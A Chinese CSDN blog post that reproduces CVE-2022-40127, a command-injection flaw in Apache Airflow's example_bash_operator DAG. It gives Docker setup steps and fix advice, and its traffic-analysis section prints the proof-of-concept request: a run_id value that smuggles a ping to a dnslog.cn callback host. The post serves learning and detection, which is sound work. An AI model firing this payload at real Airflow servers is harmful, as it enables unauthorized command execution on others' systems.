CVE-2022-40127 Apache Airflow代码注入漏洞复现

最新推荐文章于 2024-09-14 10:24:09 发布
最新推荐文章于 2024-09-14 10:24:09 发布
阅读量611 收藏
点赞数
分类专栏: 漏洞复现【Pay】 文章标签: 网络安全 web安全 安全威胁分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44281295/article/details/128046204
版权
本文详细介绍了Apache Airflow中CVE-2022-40127代码注入漏洞的原理,影响版本,环境搭建过程以及漏洞复现步骤。通过DNSLog和流量分析,揭示了攻击者的POC特征,并给出了修复建议。提醒读者,该内容仅供参考学习,不可用于非法目的。
摘要由CSDN通过智能技术生成

目录

0x01 声明:

0x02 简介:

0x03 漏洞概述:

0x04 影响版本:

0x05 环境搭建:

Docker环境:

0x06 漏洞复现:

DNSLog:

POC利用:

查看DNSLog:

0x07 流量分析:

Dns请求特征:

POC特征:

0x08 修复建议:

0x01 声明:

        仅供学习参考使用,请勿用作违法用途,否则后果自负。

0x02 简介:

        Apache Airflow是一款开源的,分布式任务调度框架,它将一个具有上下级依赖关系的工作流,组装成一个有向无环图。

0x03 漏洞概述:

        Apache Airflow 内置的 example_bash_operator 工作流中的 run_id 参数可以被执行,攻击者控制此参数并造成命令注入,从而 RCE。

0x04 影响版本:

        Apache Airflow < 2.4.0

0x05 环境搭建:

Docker环境:

        参考这篇文章:(Docker&Docker-compose环境安装_Evan Kang的博客-CSDN博客)

漏洞环境:

curl -LfO 'https://airflow.apache.org/docs/apache-airflow/2.3.4/docker-compose.yaml'

mkdir -p ./dags ./logs ./plugins

echo -e "AIRFLOW_UID=$(id -u)" > .env

docker-compose up airflow-init

docker-compose up -d

!!waiting some times!!

open ip:8080
账号:airflow

密码:airflow

0x06 漏洞复现:

DNSLog:

POC利用:

查看DNSLog:

0x07 流量分析:

Dns请求特征:

POC特征:

客户端请求:

URL:

POST /trigger?dag_id=example_bash_operator

DATA:

run_id=%7B%22fxoxx%22%3A%22%5C%22%3Bping+tqpofh.dnslog.cn%3B%5C%22%22%7D

0x08 修复建议:

        官方已经针对漏洞发布了版本更新(最新版为2.4.3),下载地址如下:

https://airflow.apache.org/docs/apache-airflow/stable/installation/installing-from-sources.html

Kang_Sec
关注
专栏目录
简单的Apache AirflowCVE-2022-40127漏洞复现
kali_Ma的博客
12-09 1563
Apache Airflow 是一个可编程,调度和监控的工作流平台,基于有向无环图(DAG),Airflow 可以定义一组有依赖的任务,按照依赖依次执行。官方已发布版本 2.4.3,可升级Apache Airflow版本到2.4.0或以上,或者停用默认 Dags。当攻击者可访问到Apache Airflow的后台,且环境中存在默认。
信息安全专业全国院校排名(非常全面),收藏这一篇就够了
Python_0011的博客
05-02 949
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。信息安全专业国家级一流本科专业大学。
无胁科技-TVD每日漏洞情报-2022-11-17
wuthreat无胁科技的博客
11-18 471
参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?漏洞编号:CVE-2022-40127;漏洞编号:CVE-2022-42785;
CVE-2020-11978 Apache Airflow 命令注入漏洞分析与利用
CuiXY's Blog
09-29 1149
漏洞软件:Apache Airflow影响版本:
漏洞复现——Apache Airflow 示例dag中的命令注入CVE-2020-11978)
m0_65149086的博客
05-26 445
懵逼日常
Apache Airflow Celery 消息中间件命令执行(CVE-2020-11981)
weixin_44047654的博客
11-28 1159
Apache Airflow Celery 消息中间件命令执行(CVE-2020-11981)
Apache Airflow 示例dag中的命令注入(CVE-2020-11978)
weixin_44047654的博客
11-29 792
Apache Airflow 示例dag中的命令注入(CVE-2020-11978)
airflow CVE-2020-11978复现
weixin_46203741的博客
03-08 167
vulhub 漏洞复现apache airflow
漏洞深度分析|Apache Airflow example_bash_operator DAG 远程代码执行漏洞
LJQClqjc的博客
11-17 589
棱镜七彩漏洞分析
CVE-2022-33891POC Apache Spark 命令注入CVE-2022-33891)POC
08-10
Apache Spark 命令注入CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1<Apache spark 版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
05-05
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661.pdf
09-27
【WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661】是一个近期发现的安全问题,涉及到WordPress的核心函数`WP_Query`。这个漏洞并非直接的SQL注入,但因为`WP_Query`经常被WordPress插件广泛使用,所以其潜在的危害...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8465
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全(黑客技术)2024年三个月自学手册
最新发布
2401_85026116的博客
09-14 3338
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全实训八(y0usef靶机渗透实例)
Wrop的博客
09-12 537
y0usef靶机渗透实例
网络安全 L1 Introduction to Security
weixin_74400487的博客
09-12 878
Then he/she may be able to decrypt passwords offline using brute force (thereby bypassing methods to prevent on-line password cracking).暴力破解是一种尝试所有可能的密码组合,直到找到正确密码的方法。由于这种破解尝试是在攻击者的系统上进行的,而不是直接针对目标系统,因此它可以绕过目标系统上可能存在的防止在线密码破解的措施,如账户锁定策略或登录尝试限制。
零基础小白能学网络安全吗?
2401_83781461的博客
09-11 460
网络安全涉及很多内容、计算机网络、暴力破解、安全工具、漏洞扫描、渗透测试、社会工程学、密码学、编程能力等等等等,学习起来需要大量的时间和精力。首先,问出这个问题的朋友,我大致判断一下,你对网络安全并不了解,只是单纯看到某个视频某篇文章,对其感兴趣,说白了你没有足够的动力驱动。但这并不意味着你不能学习。如果你正好是相反之人,可以先接触学学看,如果真的很难理解其中的概念和原理,那么或许你真的不适合学习网络安全。在大众眼中,网络安全可能就是黑别人网站的,账号被盗了能帮忙找到的,还有遇见老赖问能不能找到这个人的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Kang_Sec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值